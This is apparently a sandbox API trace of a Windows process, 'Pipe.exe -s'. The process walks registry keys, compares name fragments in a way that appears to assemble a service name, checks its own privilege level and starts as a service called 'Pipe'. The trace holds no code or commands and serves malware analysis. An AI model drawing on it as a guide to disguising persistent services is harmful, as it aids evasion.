returned -1 [0065.977] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0065.977] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0065.977] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0065.978] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0065.978] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0065.978] RegEnumKeyW (in: hKey=0x98, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0065.978] lstrlenW (lpString="MobilePC") returned 8 [0065.978] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x59a248 [0065.978] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0065.978] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0065.978] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0065.978] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0065.978] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0065.978] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0065.978] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x12) returned 0x599ae8 [0065.978] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0065.978] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0065.978] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0065.978] RegEnumKeyW (in: hKey=0x98, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0065.978] lstrlenW (lpString="MPDEV") returned 5 [0065.978] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599b08 [0065.978] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0065.978] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0065.978] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0065.978] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0065.979] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0065.979] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0065.979] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0065.979] RegEnumKeyW (in: hKey=0x98, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0065.979] lstrlenW (lpString="MSDTC") returned 5 [0065.979] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599b28 [0065.979] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0065.979] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0065.979] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0065.979] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0065.979] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0065.979] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0065.979] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0065.979] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0065.979] RegEnumKeyW (in: hKey=0x98, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0065.979] lstrlenW (lpString="MUI") returned 3 [0065.979] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599b48 [0065.979] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0065.979] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0065.979] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0065.979] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0065.979] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0065.980] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0065.980] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0065.980] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0065.980] RegEnumKeyW (in: hKey=0x98, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0065.980] lstrlenW (lpString="NetDiagFx") returned 9 [0065.980] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599b68 [0065.980] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0065.980] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0065.980] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0065.980] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0065.980] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0065.980] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0065.980] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0065.980] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0065.980] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0065.980] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x599b88 [0065.980] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0065.980] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0065.980] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0065.980] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0065.980] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x12) returned 0x599ba8 [0065.981] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0065.981] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0065.981] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0065.981] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0065.981] RegEnumKeyW (in: hKey=0x98, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0065.981] lstrlenW (lpString="NetTrace") returned 8 [0065.981] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599bc8 [0065.981] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0065.981] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0065.981] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0065.981] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0065.981] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0065.981] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0065.981] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0065.981] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0065.981] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0065.981] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0065.981] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599bc8 | out: hHeap=0x580000) returned 1 [0065.981] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599bc8 [0065.981] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0065.981] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0065.981] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0065.982] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0065.982] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0065.982] RegEnumKeyW (in: hKey=0x98, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0065.982] lstrlenW (lpString="Network") returned 7 [0065.982] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a270 [0065.982] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0065.982] lstrlenW (lpString="NetworkProvider") returned 15 [0065.982] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a298 [0065.982] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0065.982] lstrlenW (lpString="Nls") returned 3 [0065.982] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599be8 [0065.982] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0065.982] lstrlenW (lpString="NodeInterfaces") returned 14 [0065.982] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x599c08 [0065.982] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0065.983] lstrlenW (lpString="Nsi") returned 3 [0065.983] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599c28 [0065.983] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0065.983] lstrlenW (lpString="PCW") returned 3 [0065.983] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599c48 [0065.983] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0065.983] lstrlenW (lpString="PnP") returned 3 [0065.983] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x12) returned 0x599c68 [0065.983] RegEnumKeyW (in: hKey=0x98, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0065.983] lstrlenW (lpString="Power") returned 5 [0065.983] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599c88 [0065.983] RegEnumKeyW (in: hKey=0x98, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0065.983] lstrlenW (lpString="Print") returned 5 [0065.983] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599ca8 [0065.983] RegEnumKeyW (in: hKey=0x98, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0065.983] lstrlenW (lpString="PriorityControl") returned 15 [0065.983] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x59a2c0 [0065.983] RegEnumKeyW (in: hKey=0x98, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0065.983] lstrlenW (lpString="ProductOptions") returned 14 [0065.983] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a2e8 [0065.983] RegEnumKeyW (in: hKey=0x98, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0065.983] lstrlenW (lpString="Remote Assistance") returned 17 [0065.983] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x59a338 [0065.984] RegEnumKeyW (in: hKey=0x98, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0065.984] lstrlenW (lpString="SafeBoot") returned 8 [0065.984] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x599cc8 [0065.984] RegEnumKeyW (in: hKey=0x98, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0065.984] lstrlenW (lpString="ScsiPort") returned 8 [0065.984] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x599d08 [0065.984] RegEnumKeyW (in: hKey=0x98, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0065.984] lstrlenW (lpString="SecurePipeServers") returned 17 [0065.984] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x59a360 [0065.984] RegEnumKeyW (in: hKey=0x98, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0065.984] lstrlenW (lpString="SecurityProviders") returned 17 [0065.984] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x59a3b0 [0065.984] RegEnumKeyW (in: hKey=0x98, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0065.984] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0065.984] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a400 [0065.984] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0065.984] lstrlenW (lpString="ServiceProvider") returned 15 [0065.984] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a428 [0065.984] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0065.984] lstrlenW (lpString="Session Manager") returned 15 [0065.984] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a428 [0065.985] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0065.985] lstrlenW (lpString="SNMP") returned 4 [0065.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x599d68 [0065.985] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0065.985] lstrlenW (lpString="SQMServiceList") returned 14 [0065.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x22) returned 0x59aa60 [0065.985] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0065.985] lstrlenW (lpString="Srp") returned 3 [0065.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599d88 [0065.985] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0065.985] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0065.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599da8 [0065.985] RegEnumKeyW (in: hKey=0x98, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0065.985] lstrlenW (lpString="StillImage") returned 10 [0065.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599da8 [0065.985] RegEnumKeyW (in: hKey=0x98, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0065.985] lstrlenW (lpString="Storage") returned 7 [0065.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a478 [0065.985] RegEnumKeyW (in: hKey=0x98, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0065.985] lstrlenW (lpString="SystemResources") returned 15 [0065.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x59a4a0 [0065.986] RegEnumKeyW (in: hKey=0x98, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0065.986] lstrlenW (lpString="TabletPC") returned 8 [0065.986] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x59a4c8 [0065.986] RegEnumKeyW (in: hKey=0x98, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0065.986] lstrlenW (lpString="Terminal Server") returned 15 [0065.986] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x59a4f0 [0065.986] RegEnumKeyW (in: hKey=0x98, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0065.986] lstrlenW (lpString="TimeZoneInformation") returned 19 [0065.986] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x16) returned 0x599de8 [0065.986] RegEnumKeyW (in: hKey=0x98, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0065.986] lstrlenW (lpString="usbflags") returned 8 [0065.986] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x59a540 [0065.986] RegEnumKeyW (in: hKey=0x98, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0065.986] lstrlenW (lpString="usbstor") returned 7 [0065.986] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a568 [0065.986] RegEnumKeyW (in: hKey=0x98, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0065.986] lstrlenW (lpString="VAN") returned 3 [0065.986] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599e28 [0065.986] RegEnumKeyW (in: hKey=0x98, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0065.986] lstrlenW (lpString="Video") returned 5 [0065.986] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599e48 [0065.987] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0065.987] lstrlenW (lpString="wcncsvc") returned 7 [0065.987] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a590 [0065.987] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0065.987] lstrlenW (lpString="Wdf") returned 3 [0065.987] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599e68 [0065.987] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0065.987] lstrlenW (lpString="WDI") returned 3 [0065.987] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599e88 [0065.987] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0065.987] lstrlenW (lpString="Windows") returned 7 [0065.987] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c) returned 0x59a5b8 [0065.987] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0065.987] lstrlenW (lpString="Winlogon") returned 8 [0065.987] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x59a5e0 [0065.987] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0065.987] lstrlenW (lpString="WMI") returned 3 [0065.987] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599ea8 [0065.987] RegEnumKeyW (in: hKey=0x98, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0065.987] lstrlenW (lpString="hivelist") returned 8 [0065.987] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1e) returned 0x59a608 [0065.988] RegEnumKeyW (in: hKey=0x98, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0065.988] lstrlenW (lpString="SystemInformation") returned 17 [0065.988] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1a) returned 0x59a630 [0065.988] RegEnumKeyW (in: hKey=0x98, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0065.988] lstrlenW (lpString="Winresume") returned 9 [0065.988] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x59a630 [0065.988] RegEnumKeyW (in: hKey=0x98, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0065.988] RegCloseKey (hKey=0x98) returned 0x0 [0065.988] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\Pipe.exe -s" [0065.988] StrChrW (lpStart="C:\\Windows\\SysWOW64\\Pipe.exe -s", wMatch=0x20) returned=" -s" [0065.988] StrTrimW (in: psz="-s", pszTrimChars=" " | out: psz="-s") returned 0 [0065.988] GetVersion () returned 0x1db10106 [0065.988] GetCurrentProcess () returned 0xffffffff [0065.988] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff28 | out: TokenHandle=0x18ff28*=0x98) returned 1 [0065.988] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x14, TokenInformation=0x18ff20, TokenInformationLength=0x4, ReturnLength=0x18ff2c | out: TokenInformation=0x18ff20, ReturnLength=0x18ff2c) returned 1 [0065.988] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff2c | out: TokenInformation=0x0, ReturnLength=0x18ff2c) returned 0 [0065.988] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x14) returned 0x599ec8 [0065.988] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x599ec8, TokenInformationLength=0x14, ReturnLength=0x18ff2c | out: TokenInformation=0x599ec8, ReturnLength=0x18ff2c) returned 1 [0065.988] GetSidSubAuthorityCount (pSid=0x599ed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 0x599ed1 [0065.988] GetSidSubAuthority (pSid=0x599ed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000), nSubAuthority=0x0) returned 0x599ed8 [0065.988] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ec8 | out: hHeap=0x580000) returned 1 [0065.988] CloseHandle (hObject=0x98) returned 1 [0065.989] lstrlenW (lpString="-s") returned 2 [0065.989] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x6) returned 0x59aa90 [0065.989] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x4) returned 0x59aaa0 [0065.989] lstrlenW (lpString="-s") returned 2 [0065.989] StartServiceCtrlDispatcherW (lpServiceTable=0x18ff3c*(lpServiceName="Pipe", lpServiceProc=0x10034bf)) returned 1 [0066.445] SetEvent (hEvent=0xd8) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599350 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993b0 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599a48 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ae8 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ba8 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599c68 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599190 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5991b0 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599390 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993d0 | out: hHeap=0x580000) returned 1 [0081.797] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599988 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599a28 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599a68 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599aa8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599b48 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599b68 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599be8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599c28 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599c48 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599d88 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599e28 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599e68 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599e88 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ea8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599170 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5998b0 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5999a8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599a08 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599b88 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599c08 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599cc8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ce8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599d08 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599d28 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599d48 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599d68 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599de8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599e08 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599370 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5998d0 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5998f0 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5999c8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5999e8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599a88 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ac8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599b08 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599b28 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599bc8 | out: hHeap=0x580000) returned 1 [0081.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599c88 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599ca8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599da8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599dc8 | out: hHeap=0x580000) returned 1 [0081.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599e48 | out: hHeap=0x580000) returned 1 